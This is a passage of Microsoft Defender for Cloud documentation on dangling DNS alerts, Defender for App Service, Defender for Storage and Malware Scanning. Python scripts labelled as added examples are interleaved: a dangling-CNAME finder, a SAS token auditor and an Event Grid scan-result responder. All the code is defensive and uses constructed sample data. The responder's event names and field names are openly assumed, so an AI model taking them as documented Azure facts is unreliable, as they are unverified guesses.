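    DnsRecord("old.example.com", "CNAME", "Contoso-Old.AzureWebsites.NET."),  # mixed case
    DnsRecord("mail.example.com", "CNAME", "mail.protection.example.net"),   # not App Service
    DnsRecord("api.example.com", "A", "203.0.113.10"),                      # A records not checked
    DnsRecord("loop1.example.com", "CNAME", "loop2.example.com"),
    DnsRecord("loop2.example.com", "CNAME", "loop1.example.com"),           # CNAME loop
]

# Constructed inventory of App Service sites that still exist (for instance the
# output of a Resource Graph query). contoso-shop and contoso-old were deleted.
LIVE_APP_SERVICE_HOSTS = ["contoso-blog.azurewebsites.net"]


def report(findings: List[Finding]) -> List[str]:
    """One line per dangling record, showing the in-zone path to the dead target."""
    lines = []
    for f in findings:
        via = f" via {' -> '.join(f.chain)}" if f.chain else ""
        lines.append(f"DANGLING {f.name}{via} -> {f.target}")
    return lines


if __name__ == "__main__":
    for line in report(find_dangling(SAMPLE_ZONE, LIVE_APP_SERVICE_HOSTS)):
        print(line)
```

Run it against a real zone export and the current list of App Service default hostnames; every reported record should either be repointed or deleted before the old hostname can be claimed by someone else.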
[Screenshot: the Defender for Cloud security alerts list filtered to the "Dangling DNS Record 
detected on App Service" alert. The alert description reads: "A DNS record that points to a 
recently deleted App Service resource has been detected. This is also known as "dangling 
DNS" entry and leaves you susceptible to a subdomain takeover. Subdomain takeovers 
enable malicious actors to redirect traffic intended for an organization's domain to a site 
performing malicious activity."] 


Learn more about dangling DNS and the threat of subdomain takeover, in Prevent 
dangling DNS entries and avoid subdomain takeover. 


For a full list of the App Service alerts, see the Reference table of alerts. 


Note 


Defender for Cloud might not trigger dangling DNS alerts if your custom domain 
doesn't point directly to an App Service resource, or if Defender for Cloud hasn't 
monitored traffic to your website since the dangling DNS protection was enabled 
(because there won't be logs to help identify the custom domain). 


Next steps 


In this article, you learned about Microsoft Defender for App Service. 


Enable enhanced protections 


For related material, see the following articles: 

• To export your alerts to Microsoft Sentinel, any third-party SIEM, or any other 
  external tool, follow the instructions in Stream alerts to a SIEM, SOAR, or IT Service 
  Management solution. 
• For a list of the Microsoft Defender for App Service alerts, see the Reference table 
  of alerts. 
• For more information on App Service plans, see App Service plans. 


Protect your applications with Defender for App Service 


Azure App Service is a fully managed platform for building and hosting your web apps 
and APIs. It provides management, monitoring, and operational insights to meet 
enterprise-grade performance, security, and compliance requirements. For more 
information, see Azure App Service. 


Microsoft Defender for App Service uses the scale of the cloud to identify attacks 
targeting applications running over App Service. Attackers probe web applications to 
find and exploit weaknesses. Before being routed to specific environments, requests to 
applications running in Azure go through several gateways, where they're inspected and 
logged. The data is then used to identify exploits and attackers, and to learn new 
patterns that are used later. 


When you enable Microsoft Defender for App Service, you immediately benefit from the 
following services offered by this Defender plan: 


• Secure - Defender for App Service assesses the resources covered by your App 
  Service plan and generates security recommendations based on its findings. Use 
  the detailed instructions in these recommendations to harden your App Service 
  resources. 
• Detect - Defender for App Service detects a multitude of threats to your App 
  Service resources by monitoring: 
    - the VM instance in which your App Service is running, and its management 
      interface 
    - the requests and responses sent to and from your App Service apps 
    - the underlying sandboxes and VMs 
    - App Service internal logs - available thanks to the visibility that Azure has as a 
      cloud provider 


As a cloud-native solution, Defender for App Service can identify attack methodologies 
applying to multiple targets. For example, from a single host it would be difficult to 
identify a distributed attack from a small subset of IPs, crawling to similar endpoints on 
multiple hosts. 


The log data and the infrastructure together can tell the story: from a new attack 
circulating in the wild to compromises in customer machines. Therefore, even if 
Microsoft Defender for App Service is deployed after a web app has been exploited, it 
might be able to detect ongoing attacks. 


You can learn more about Defender for Cloud's pricing on the pricing page. 


Prerequisites 


• You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
  you can sign up for a free subscription. 
• You must enable Microsoft Defender for Cloud on your Azure subscription. 
• You must have a supported App Service plan associated with dedicated machines. 
  See the list of supported plans. 


Enable the Defender for App Service plan 


When you enable Defender for Cloud, you have the ability to add the Defender for App 
Service plan to your subscription to manage, monitor and gain operational insights to 
meet enterprise-grade performance, security, and compliance requirements for your 
machines. 


To enable Defender for App Service on your subscription: 

1. Sign in to the Azure portal. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 
5. On the Defender plans page, toggle the App Service plan to On. 

   [Screenshot: the Defender plans page. The page notes: "When you select Save, Microsoft 
   Defender for Cloud's enhanced security features will be enabled on all the resource types 
   you've selected. The first 30 days are free. For more information on Defender for Cloud 
   pricing, visit the pricing page."] 

6. Select Save. 


Next steps 


Overview of Defender for App Service to protect your Azure App Service web apps and 
APIs 


Overview of Microsoft Defender for Storage 


Microsoft Defender for Storage is an Azure-native layer of security intelligence that 
detects potential threats to your storage accounts. 

It helps prevent the three major impacts on your data and workload: malicious file 
uploads, sensitive data exfiltration, and data corruption. 


Note 


This article is about the new Defender for Storage plan that was launched on March 
28, 2023. It includes new features like Malware Scanning and Sensitive Data Threat 
Detection. This plan also provides a more predictable pricing structure for better 
control over coverage and costs. Additionally, all new Defender features will only be 
added to the new plan. Migrating to the new plan is a simple process; read here 
about how to migrate from the classic plan. 


Microsoft Defender for Storage provides comprehensive security by analyzing the data 
plane and control plane telemetry generated by Azure Blob Storage, Azure Files, 
and Azure Data Lake Storage services. It uses advanced threat detection capabilities 
powered by Microsoft Threat Intelligence, Microsoft Defender Antivirus, and Sensitive 
Data Discovery to help you discover and mitigate potential threats. 


Defender for Storage includes: 

• Activity Monitoring 
• Sensitive data threat detection (preview feature, new plan only) 
• Malware Scanning (new plan only) 


[Diagram: common threats to storage accounts: access token leakage and abuse, 
credential theft, lateral movement from compromised workloads, reconnaissance with 
search engines, compromised third-party partners with privileged permissions, and 
malicious insiders that already have permissions.] 

Getting started 


With a simple agentless setup at scale, you can enable Defender for Storage at the 
subscription or resource levels through the portal or programmatically. When enabled at 
the subscription level, all existing and newly created storage accounts under that 
subscription will be automatically protected. You can also exclude specific storage 
accounts from protected subscriptions. 


Note 


If you already have the Defender for Storage (classic) enabled and want to access 
the new security features and pricing, you'll need to migrate to the new pricing 
plan. 


Availability 


Aspect                     Details 
Release state:             General Availability (GA) 
Feature availability:      - Activity monitoring (security alerts): General Availability (GA) 
                           - Malware Scanning: General Availability (GA) 
                           - Sensitive data threat detection (Sensitive Data Discovery): Preview 
Pricing:                   - Defender for Storage: $10/storage account/month* 
                           - Malware Scanning (add-on): $0.15/GB (USD) of data ingested** 
                           Above pricing applies to commercial clouds. Visit the pricing page to 
                           learn more. 
                           * Storage accounts that exceed 73 million monthly transactions will be 
                             charged $0.1492 for every 1 million transactions that exceed the 
                             threshold. 
                           ** Billing begins on September 3, 2023. To limit expenses, use the 
                              Monthly capping feature to set a cap on the amount of GB scanned per 
                              month, per storage account to help you control your costs. 
Supported storage types:   - Blob Storage (Standard/Premium StorageV2, including Data Lake Gen2): 
                             Activity monitoring, Malware Scanning, Sensitive Data Discovery 
                           - Azure Files (over REST API and SMB): Activity monitoring 
Required roles and         For Malware Scanning and sensitive data threat detection at subscription 
permissions:               and storage account levels, you need Owner roles (subscription 
                           owner/storage account owner) or specific roles with corresponding data 
                           actions. To enable Activity Monitoring, you need 'Security Admin' 
                           permissions. Read more about the required permissions. 
Clouds:                    - Commercial clouds* 
                           - Azure Government (only activity monitoring support on the classic plan) 
                           - Microsoft Azure operated by 21Vianet: not supported 
                           - Connected AWS accounts: not supported 
                           * Azure DNS Zone isn't supported for Malware Scanning and sensitive data 
                             threat detection. 


What are the benefits of Microsoft Defender 
for Storage? 


[Diagram: comprehensive cloud storage protection with Defender for Storage, preventing 
sensitive data from leaking and preventing malware upload and distribution. Four 
capabilities are shown: control and data plane activity monitoring; behavioral modeling to 
identify early signs of breach; near real-time malware scanning across all file types; and 
detection of sensitive data exposure and exfiltration events. Powered by Microsoft Threat 
Intelligence, with built-in integration with Microsoft Sentinel.] 


Defender for Storage provides the following: 

• Better protection against malware: Malware Scanning scans and detects in 
  near real-time all file types, including archives, of every uploaded blob, and 
  provides fast and reliable results, helping you prevent your storage accounts from 
  acting as an entry and distribution point for threats. Learn more about Malware 
  Scanning. 
• Improved threat detection and protection of sensitive data: The sensitive data 
  threat detection capability enables security professionals to efficiently prioritize 
  and examine security alerts by considering the sensitivity of the data that could be 
  at risk, leading to better detection and protection against potential threats. By 
  quickly identifying and addressing the most significant risks, this capability lowers 
  the likelihood of data breaches and enhances sensitive data protection by 
  detecting exposure events and suspicious activities on resources containing 
  sensitive data. Learn more about sensitive data threat detection. 
• Detection of entities without identities: Defender for Storage detects suspicious 
  activities generated by entities without identities that access your data using 
  misconfigured and overly permissive Shared Access Signatures (SAS tokens) that 
  may have leaked or been compromised, so that you can improve your security 
  hygiene and reduce the risk of unauthorized access. This capability is an expansion 
  of the Activity Monitoring security alerts suite. 
• Coverage of the top cloud storage threats: Defender for Storage uses Microsoft 
  Threat Intelligence, behavioral models, and machine learning models to detect 
  unusual and suspicious activities. The Defender for Storage security alerts cover 
  the top cloud storage threats, such as sensitive data exfiltration, data corruption, 
  and malicious file uploads. 
• Comprehensive security without enabling logs: When Microsoft Defender for 
  Storage is enabled, it continuously analyzes both the data plane and control plane 
  telemetry stream generated by Azure Blob Storage, Azure Files, and Azure Data 
  Lake Storage services without the requirement of enabling diagnostic logs. 
• Frictionless enablement at scale: Microsoft Defender for Storage is an agentless 
  solution, easy to deploy, and enables security protection at scale using a native 
  Azure solution. 
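The "entities without identities" bullet above covers detection of suspicious use of SAS tokens; the hygiene side, knowing which of your own tokens are over-permissive before one leaks, is something you can check yourself. The script below is an added example, not Microsoft's code and not a Defender for Storage rule: it parses the standard SAS query parameters (sv, ss, srt, sr, sp, st, se, si, sip, spr) and flags mutating permissions, long lifetimes, missing IP restriction, plain-HTTP use and broad account-level scope. The sample tokens, the 7-day threshold and the finding codes are constructed for this example.

```python
"""Audit a Shared Access Signature (SAS) token for settings that make a leaked copy
dangerous. Added example (not Microsoft's code). The thresholds and finding codes
are this example's own choices, not Defender for Storage rules; the parameter
names are the documented SAS query parameters.
"""
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs

# 'sp' letters that let the holder add, create, write, delete (including versions and
# permanent delete), move or update data, as opposed to read (r), list (l) or tag (t).
MUTATING_PERMISSIONS = set("acwdxymu")

Finding = Tuple[str, str]   # (code, human-readable message)


def parse_sas(token: str) -> Dict[str, str]:
    """Parse a bare SAS token, '?'-prefixed token or full SAS URL into fields."""
    query = token.split("?", 1)[1] if "?" in token else token
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def parse_sas_time(value: str) -> Optional[datetime]:
    """SAS times are ISO 8601 UTC; accept the common precisions, else None."""
    for fmt in ("%Y-%m-%dT%H:%M:%SZ", "%Y-%m-%dT%H:%MZ", "%Y-%m-%d"):
        try:
            return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    return None


def audit_sas(token: str, now: datetime,
              max_lifetime: timedelta = timedelta(days=7)) -> List[Finding]:
    """Return the risk findings for one token, in a fixed order; [] means clean."""
    f = parse_sas(token)
    findings: List[Finding] = []

    perms = set(f.get("sp", ""))
    mutating = perms & MUTATING_PERMISSIONS
    if mutating:
        findings.append(("MUTATING", f"grants mutating permissions: {''.join(sorted(mutating))}"))
    if "l" in perms:
        findings.append(("LIST", "grants list permission: holder can enumerate content"))

    expiry = parse_sas_time(f.get("se", ""))
    if expiry is None:
        if "si" in f:   # expiry may come from a stored access policy instead
            findings.append(("POLICY_EXPIRY", "expiry set by stored access policy (si); review it"))
        else:
            findings.append(("NO_EXPIRY", "no parsable expiry (se); treat as long-lived"))
    elif expiry <= now:
        return [("EXPIRED", "token already expired; nothing further to assess")]
    elif expiry - now > max_lifetime:
        findings.append(("LONG_LIVED", f"valid for {(expiry - now).days} more days "
                                       f"(threshold {max_lifetime.days})"))

    if "sip" not in f:
        findings.append(("NO_IP_RANGE", "not restricted to an IP range (sip)"))

    # An omitted spr means the token is accepted over both https and http.
    if "http" in f.get("spr", "https,http").split(","):
        findings.append(("PLAIN_HTTP", "usable over plain HTTP (spr)"))

    if "ss" in f:                       # account SAS rather than service SAS
        services = set(f["ss"])
        if len(services) > 1:
            findings.append(("MULTI_SERVICE", f"account SAS spans services: {''.join(sorted(services))}"))
        if "s" in f.get("srt", ""):
            findings.append(("SERVICE_LEVEL", "srt includes service-level operations"))
    return findings


# Fixed clock so the sample run is reproducible.
NOW = datetime(2024, 5, 1, 8, 30, tzinfo=timezone.utc)

# Constructed tokens; the account name and 'sig' values are placeholders.
OVERLY_PERMISSIVE_SAS = (
    "?sv=2022-11-02&ss=bfqt&srt=sco&sp=rwdlacupx"
    "&se=2030-01-01T00:00:00Z&spr=https,http&sig=PLACEHOLDER"
)
SCOPED_READ_SAS = (
    "https://contoso.blob.core.windows.net/receipts/2024/r1.pdf"
    "?sv=2022-11-02&sr=b&sp=r&st=2024-05-01T08:00:00Z&se=2024-05-01T09:00:00Z"
    "&sip=203.0.113.10-203.0.113.20&spr=https&sig=PLACEHOLDER"
)

if __name__ == "__main__":
    for label, token in (("permissive", OVERLY_PERMISSIVE_SAS), ("scoped", SCOPED_READ_SAS)):
        print(label, [code for code, _ in audit_sas(token, NOW)] or "clean")
```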


How does the service work? 


Activity monitoring 


Defender for Storage continuously analyzes data and control plane logs from protected 
storage accounts when enabled. There's no need to turn on resource logs for security 
benefits. It uses Microsoft Threat Intelligence to identify suspicious signatures such as 
malicious IP addresses, Tor exit nodes, and potentially dangerous apps. It also builds 
data models and uses statistical and machine-learning methods to spot baseline activity 
anomalies, which may indicate malicious behavior. You receive security alerts for 
suspicious activities, but Defender for Storage ensures you won't get too many similar 
alerts. Activity monitoring won't affect performance, ingestion capacity, or access to 
your data. 


[Diagram: Control and data plane activity monitoring] 


Malware Scanning (powered by Microsoft Defender Antivirus) 


Note 


Billing for Malware Scanning begins on September 3, 2023. To limit expenses, use 
the Monthly capping feature to set a cap on the amount of GB scanned per month, 
per storage account to help you control your costs. 


Malware Scanning in Defender for Storage helps protect storage accounts from 
malicious content by performing a full malware scan on uploaded content in near real 
time, applying Microsoft Defender Antivirus capabilities. It's designed to help fulfill 
security and compliance requirements to handle untrusted content. Every file type is 
scanned, and scan results are returned for every file. The Malware Scanning capability is 
an agentless SaaS solution that allows simple setup at scale, with zero maintenance, and 
supports automating response at scale. This is a configurable feature in the new 
Defender for Storage plan that is priced per GB scanned. Learn more about Malware 
Scanning. 


Sensitive data threat detection (powered by Sensitive Data Discovery) 


The ‘sensitive data threat detection’ capability enables security teams to efficiently 
prioritize and examine security alerts by considering the sensitivity of the data that could 
be at risk, leading to better detection and preventing data breaches. ‘Sensitive data 
threat detection’ is powered by the “Sensitive Data Discovery” engine, an agentless 
engine that uses a smart sampling method to find resources with sensitive data. The 
service is integrated with Microsoft Purview's sensitive information types (SITs) and 
classification labels, allowing seamless inheritance of your organization's sensitivity 
settings. 


This is a configurable feature in the new Defender for Storage plan. You can choose to 
enable or disable it with no other cost. For more details, visit Sensitive data threat 
detection. 


Pricing and cost controls 


Per storage account pricing 


The new Microsoft Defender for Storage plan has predictable pricing based on the 
number of storage accounts you protect. With the option to enable at the subscription 
or resource level and exclude specific storage accounts from protected subscriptions, 
you have increased flexibility to manage your security coverage. The pricing plan 
simplifies the cost calculation process, allowing you to scale easily as your needs 
change. Other charges may apply to storage accounts with high-volume transactions. 


Malware Scanning - Billing per GB, monthly capping, and configuration 


Malware Scanning is charged on a per-gigabyte basis for scanned data. To ensure cost 
predictability, a monthly cap can be set on the volume of data scanned for each storage 
account. This cap can be set subscription-wide, affecting all storage accounts within the 
subscription, or applied to individual storage accounts. Under protected subscriptions, 
you can configure specific storage accounts with different limits. 


By default, the limit is set to 5,000 GB per month per storage account. Once this 
threshold is exceeded, scanning will cease for the remaining blobs, with a 20-GB 
confidence interval. For configuration details, refer to configure Defender for Storage. 


Enablement at scale with granular controls 


Microsoft Defender for Storage enables you to secure your data at scale with granular 
controls. You can apply consistent security policies across all your storage accounts 
within a subscription or customize them for specific accounts to suit your business 
needs. You can also control your costs by choosing the level of protection you need for 
each resource. To get started, visit enable Defender for Storage. 


Understanding the differences between Malware Scanning and hash reputation analysis 


Defender for Storage offers two capabilities to detect malicious content uploaded to 
storage accounts: Malware Scanning (paid add-on feature available only on the new 
plan) and hash reputation analysis (available in all plans). 


Malware Scanning (paid add-on feature available only on the new plan) 


Malware Scanning uses Microsoft Defender Antivirus (MDAV) to scan blobs uploaded to 
Blob storage, providing a comprehensive analysis that includes deep file scans and hash 
reputation analysis. This feature provides an enhanced level of detection against 
potential threats. 


Hash reputation analysis (available in all plans) 


Hash reputation analysis detects potential malware in Blob storage and Azure Files by 
comparing the hash values of newly uploaded blobs/files against those of known 
malware by Microsoft Threat Intelligence. Not all file protocols and operation types 
are supported with this capability, leading to some operations not being monitored for 
potential malware uploads. Unsupported use cases include SMB file shares and when a 
blob is created using Put Block and Put Block List. 


In summary, Malware Scanning, which is only available on the new plan for Blob storage, 
offers a more comprehensive approach to malware detection by analyzing the full 
content of files and incorporating hash reputation analysis in its scanning methodology. 


Next steps 
In this article, you learned about Microsoft Defender for Storage. 


e Enable Defender for Storage 
e Check out common questions about Defender for Storage. 


Malware scanning in Defender for Storage 


Malware Scanning in Defender for Storage helps protect your storage accounts from 
malicious content by performing a full malware scan on uploaded content in near real 
time, using Microsoft Defender Antivirus capabilities. It's designed to help fulfill security 
and compliance requirements for handling untrusted content. 


The Malware Scanning capability is an agentless SaaS solution that allows simple setup 
at scale, with zero maintenance, and supports automating response at scale. 


[Diagram: Detect malicious files upon upload in near-real time] 


Malware upload is a top threat on cloud storage 


Content uploaded to cloud storage could be malware. Storage accounts can be a 
malware entry point into the organization and a malware distribution point. To protect 
organizations from this threat, content in cloud storage must be scanned for malware 
before it's accessed. 


Malware scanning in Defender for Storage helps protect storage accounts from malicious content 


• A built-in SaaS solution that allows simple enabling at scale with zero maintenance. 
• Comprehensive antimalware capabilities using Microsoft Defender Antivirus 
  (MDAV), catching polymorphic and metamorphic malware. 
• Every file type is scanned (including archives like zip files) and a result is returned 
  for every scan. The file size limit is 2 GB. 
• Supports response at scale: deleting or quarantining suspicious files, based on the 
  blobs' index tags or Event Grid events. 
• When the malware scan identifies a malicious file, detailed Microsoft Defender for 
  Cloud security alerts are generated. 
• Designed to help fulfill security and compliance requirements to scan untrusted 
  content uploaded to storage, including an option to log every scan result. 


Common use-cases and scenarios 


Some common use-cases and scenarios for malware scanning in Defender for Storage 
include: 


• Web applications: many cloud web applications allow users to upload content to 
  storage. This allows low maintenance and scalable storage for applications like tax 
  apps, CV upload HR sites, and receipts upload. 
• Content protection: assets like videos and photos are commonly shared and 
  distributed at scale both internally and to external parties. CDNs (Content Delivery 
  Network) and content hubs are a classic malware distribution opportunity. 
• Compliance requirements: resources that adhere to compliance standards like 
  NIST, SWIFT, GDPR, and others require robust security practices, which include 
  malware scanning. It's critical for organizations operating in regulated industries or 
  regions. 
• Third-party integration: third-party data can come from a wide variety of sources, 
  and not all of them might have robust security practices, such as business partners, 
  developers, and contractors. Scanning for malware helps to ensure that this data 
  doesn't introduce security risks to your system. 
• Collaborative platforms: similar to file sharing, teams use cloud storage for 
  continuously sharing content and collaborating across teams and organizations. 
  Scanning for malware ensures safe collaboration. 
• Data pipelines: data moving through ETL (Extract, Transfer, Load) processes can 
  come from multiple sources and might include malware. Scanning for malware can 
  help to ensure the integrity of these pipelines. 
• Machine learning training data: the quality and security of the training data are 
  critical for effective machine learning models. It's important to ensure these data 
  sets are clean and safe, especially if they include user-generated content or data 
  from external sources. 


[Screenshot: a sample "Employee Tax Receipt Submission Portal", described as a secure 
platform for all employees to upload their tax receipts for efficient processing and 
reimbursement, illustrating the web-application upload scenario.] 


Note 


Malware scanning is a near real time service. Scan times can vary depending on the 
scanned file size or file type as well as on the load on the service or on the storage 
account. Microsoft is constantly working on reducing the overall scan time; 
however, you should take this variability in scan times into consideration when 
designing a user experience based on the service. 


Prerequisites 


To enable and configure Malware Scanning, you must have Owner roles (such as 
Subscription Owner or Storage Account Owner) or specific roles with the necessary data 
actions. Learn more about the 


You can enable and configure Malware Scanning at scale for your subscriptions while 
maintaining granular control over configuring the feature for individual storage 
accounts. There are several ways to enable and configure Malware Scanning: Azure 
built-in policy (the recommended method), programmatically using Infrastructure as 
Code templates, including Terraform, Bicep, and ARM templates, using the Azure portal, 
or directly with the REST API. 


How does malware scanning work?


On-upload malware scanning


On-upload triggers 


When a blob is uploaded to a protected storage account, a malware scan is triggered.
All upload methods trigger the scan. Modifying a blob is an upload operation, and
therefore the modified content is scanned after the update.


Scan regions and data retention 


The malware scanning service that uses Microsoft Defender Antivirus technologies reads 
the blob. Malware Scanning scans the content "in-memory" and deletes scanned files 
immediately after scanning. The content isn't retained. The scanning occurs within the 
same region of the storage account. In some cases, when a file is suspicious, and more 
data is required, Malware Scanning might share file metadata outside the scanning 
region, including metadata classified as customer data (for example, SHA-256 hash), 
with Microsoft Defender for Endpoint. 


Access customer data 


The Malware Scanning service requires access to your data to scan your data for 
malware. During service enablement, a new Data Scanner resource called 
StorageDataScanner is created in your Azure subscription. This resource is granted with 
a Storage Blob Data Owner role assignment to access and change your data for malware 
scanning and sensitive data discovery. 


Private Endpoint is supported out-of-the-box 


Malware scanning in Defender for Storage is supported in storage accounts that use 
private endpoints while maintaining data privacy. 


Private endpoints provide secure connectivity to your Azure storage services, eliminating 
public internet exposure, and are considered a best practice. 


Set up of malware scanning 


When malware scanning is enabled, the following actions automatically take place in
your environment:


• For each storage account you enable malware scanning on, an Event Grid System
Topic resource is created in the same resource group as the storage account. It is used
by the malware scanning service to listen for blob upload triggers. Removing this
resource breaks the malware scanning functionality.


• To scan your data, the Malware Scanning service requires access to your data.
During service enablement, a new Data Scanner resource called
StorageDataScanner is created in your Azure subscription and assigned a
system-assigned managed identity. This resource is granted the Storage Blob
Data Owner role assignment, permitting it to access your data for the purposes of
Malware Scanning and Sensitive Data Discovery.


If your storage account Networking configuration is set to Enable public network access
from selected virtual networks and IP addresses, the StorageDataScanner resource is
added to the Resource instances section under the storage account Networking
configuration to allow access to scan your data.


If you're enabling malware scanning on the subscription level, a new Security Operator
resource called StorageAccounts/securityOperators/DefenderForStorageSecurityOperator
is created in your Azure subscription and assigned a system-assigned managed identity.
This resource is used to enable and repair the Defender for Storage and Malware Scanning
configuration on existing storage accounts, and to check for new storage accounts created
in the subscription that need to be enabled. This resource has role assignments that
include the specific permissions needed to enable malware scanning.


Note


Malware scanning depends on certain resources, identities, and networking settings 
to function properly. If you modify or delete any of these, malware scanning will 
stop working. To restore its normal operation, you can turn it off and on again. 


Providing scan results 


Malware scanning scan results are available through four methods. After setup, you'll
see scan results as blob index tags for every uploaded and scanned file in the storage
account, and as Microsoft Defender for Cloud security alerts when a file is identified as
malicious.


You might choose to configure extra scan result methods, such as Event Grid and Log
Analytics; these methods require extra configuration. In the next section, you'll learn
about the different scan result methods.


View and consume scan results 


[Diagram: scan results are delivered as blob index tags (not supported on ADLS Gen2), Defender for Cloud security alerts, Azure Event Grid events, and Azure Log Analytics workspace logs]


Blob index tags 


Blob index tags are metadata fields on a blob. They categorize data in your storage 
account using key-value tag attributes. These tags are automatically indexed and 
exposed as a searchable multi-dimensional index to easily find data. The scan results are 
concise, displaying Malware Scanning scan result and malware scanning scan time UTC 
in the blob metadata. Other result types (alerts, events, logs) provide more information 
on the malware type and file upload operation. 
Blob index tags can be used by applications to automate workflows, but aren't
tamper-resistant. Read more on setting up response.


Defender for Cloud security alerts 


When a malicious file is detected, Microsoft Defender for Cloud generates a Microsoft 
Defender for Cloud security alert. To see the alert, go to Microsoft Defender for Cloud 
security alerts. The security alert contains details and context on the file, the malware 
type, and recommended investigation and remediation steps. To use these alerts for 
remediation, you can: 


1. View security alerts in the Azure portal by navigating to Microsoft Defender for
Cloud > Security alerts.

2. Configure automations based on these alerts.

3. Export security alerts to a SIEM. You can continuously export security alerts to
Microsoft Sentinel (Microsoft's SIEM) using the Microsoft Sentinel connector, or to
another SIEM of your choice.


Learn more about responding to security alerts. 


Event Grid event 


Event Grid is useful for event-driven automation. It's the fastest method to get results 
with minimum latency in a form of events that you can use for automating response. 


Events from Event Grid custom topics can be consumed by multiple endpoint types. The
most useful for malware scanning scenarios are:


• Function App (previously called Azure Function) - use a serverless function to run
code for automated response like move, delete or quarantine.

• Webhook - to connect an application.

• Event Hubs & Service Bus Queue - to notify downstream consumers.


Learn how to configure Malware Scanning so that every scan result is sent automatically 
to an Event Grid topic for automation purposes. 
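As an added illustration (not code from this page or from Microsoft), the decision logic a Function App or webhook consumer could run on each scan-result event before moving, deleting or quarantining a blob. The event type name and the `data` field names (`blobUri`, `scanResultType`, `scanResultDetails`) are assumptions to verify against the events your topic actually delivers; the protected-account allowlist, quarantine container and sample event are constructed.

```python
"""Added example (not Microsoft's code): decide how to respond to one Malware
Scanning result delivered through an Event Grid custom topic, e.g. inside a
Function App or webhook handler. Event type and `data` field names are assumed."""
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional
from urllib.parse import quote, unquote, urlparse

# Assumed (not on the page): verify against the events your topic delivers.
SCAN_EVENT_TYPE = "Microsoft.Security.MalwareScanningResult"
MALICIOUS = "Malicious"
CLEAN = "No threats found"

# Constructed allowlist: act only on accounts we protect, so a misrouted or
# forged event can't drive a delete or move in some other account.
PROTECTED_ACCOUNTS = {"contosouploads"}
QUARANTINE_CONTAINER = "quarantine"   # assumed container in the same account


@dataclass(frozen=True)
class BlobRef:
    account: str
    container: str
    name: str

    @property
    def url(self) -> str:
        return (f"https://{self.account}.blob.core.windows.net/"
                f"{self.container}/{quote(self.name)}")


@dataclass(frozen=True)
class ResponsePlan:
    action: str                   # "quarantine", "allow", "review" or "ignore"
    blob: Optional[BlobRef]
    reason: str
    quarantine_to: Optional[str] = None


def parse_blob_uri(uri: str) -> BlobRef:
    """Split https://<account>.blob.core.windows.net/<container>/<blob> into parts."""
    parsed = urlparse(uri)
    host = parsed.netloc.lower()
    if not host.endswith(".blob.core.windows.net"):
        raise ValueError(f"not an Azure Blob endpoint: {uri!r}")
    account = host.split(".", 1)[0]
    container, sep, name = parsed.path.lstrip("/").partition("/")
    if not (container and sep and name):
        raise ValueError(f"blob URI lacks container/blob path: {uri!r}")
    return BlobRef(account, container, unquote(name))


def plan_response(event: dict) -> ResponsePlan:
    """Map one Event Grid event (as a dict) to a response plan.

    Anything that is not an explicit clean result is treated as a gap to
    review, never as a clean bill of health."""
    if event.get("eventType") != SCAN_EVENT_TYPE:
        return ResponsePlan("ignore", None, f"unexpected eventType {event.get('eventType')!r}")
    data = event.get("data") or {}
    try:
        blob = parse_blob_uri(data.get("blobUri") or "")
    except ValueError as exc:
        return ResponsePlan("review", None, str(exc))
    if blob.account not in PROTECTED_ACCOUNTS:
        return ResponsePlan("ignore", blob, "storage account not in allowlist")
    result = data.get("scanResultType")
    if result == CLEAN:
        return ResponsePlan("allow", blob, "scan reported no threats")
    if result == MALICIOUS:
        details = data.get("scanResultDetails") or {}
        names = details.get("malwareNamesFound") or ["unnamed"]
        dest = BlobRef(blob.account, QUARANTINE_CONTAINER, blob.name)
        return ResponsePlan("quarantine", blob, "malware: " + ", ".join(names), dest.url)
    return ResponsePlan("review", blob, f"unhandled scanResultType {result!r}")


# Constructed sample event (not a real capture).
SAMPLE_MALICIOUS_EVENT = {
    "eventType": SCAN_EVENT_TYPE,
    "data": {
        "blobUri": "https://contosouploads.blob.core.windows.net/receipts/2023/q3/receipt%2042.pdf",
        "scanResultType": MALICIOUS,
        "scanResultDetails": {"malwareNamesFound": ["EICAR-Test-File"]},
        "scanFinishedTimeUtc": "2023-08-01T11:00:12Z",
    },
}

if __name__ == "__main__":
    plan = plan_response(SAMPLE_MALICIOUS_EVENT)
    print(plan.action, plan.blob.url if plan.blob else "-", "->", plan.quarantine_to, "|", plan.reason)
```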


Log Analytics


You might want to log your scan results for compliance evidence or for investigating scan
results. By setting up a Log Analytics Workspace destination, you can store every scan
result in a centralized log repository that is easy to query. You can view the results by
navigating to the Log Analytics destination workspace and looking for the
StorageMalwareScanningResults table.


Learn more about setting up logging for malware scanning. 


Tip


We invite you to explore the Malware Scanning feature in Defender for Storage
through our hands-on lab. Follow the Ninja training instructions for a detailed,
step-by-step guide on how to set up and test Malware Scanning end-to-end,
including configuring responses to scanning results. This is part of the 'labs' project
that helps customers get ramped up with Microsoft Defender for Cloud and
provides hands-on practical experience with its capabilities.


Cost control 


Malware scanning is billed per GB scanned. To provide cost predictability, Malware
Scanning supports setting a cap on the amount of GB scanned in a single month per
storage account.


The "capping" mechanism is designed to set a monthly scanning limit, measured in
gigabytes (GB), for each storage account, serving as an effective cost control. If a
predefined scanning limit is established for a storage account in a single calendar
month, the scanning operation automatically halts once this threshold is reached
(with up to a 20-GB deviation), and further files aren't scanned for malware. Updating the
cap typically takes up to an hour to take effect.


By default, a limit of 5 TB (5,000 GB) is established if no specific capping mechanism is 
defined. 


Tip


You can set the capping mechanism on either individual storage accounts or across 
an entire subscription (every storage account on the subscription will be allocated 
the limit defined on the subscription level). 


Follow these steps to configure the capping mechanism. 


Handling possible false positives 


If you have a file that you suspect might be malware or is being incorrectly detected, 
you can submit it to us for analysis through the sample submission portal. Select 
“Microsoft Defender for Storage” as the source. 


Malware Scanning doesn't block access or change permissions to the uploaded blob, 
even if it's malicious. 


Limitations 


Unsupported features and services 


• Unsupported storage accounts: Legacy v1 storage accounts aren't supported by
malware scanning.

• Unsupported service: Azure Files isn't supported by malware scanning.

• Unsupported blob types: Append and Page blobs aren't supported for Malware
Scanning.

• Unsupported encryption: Client-side encrypted blobs aren't supported, as they
can't be decrypted before scanning by the service. However, data encrypted at rest
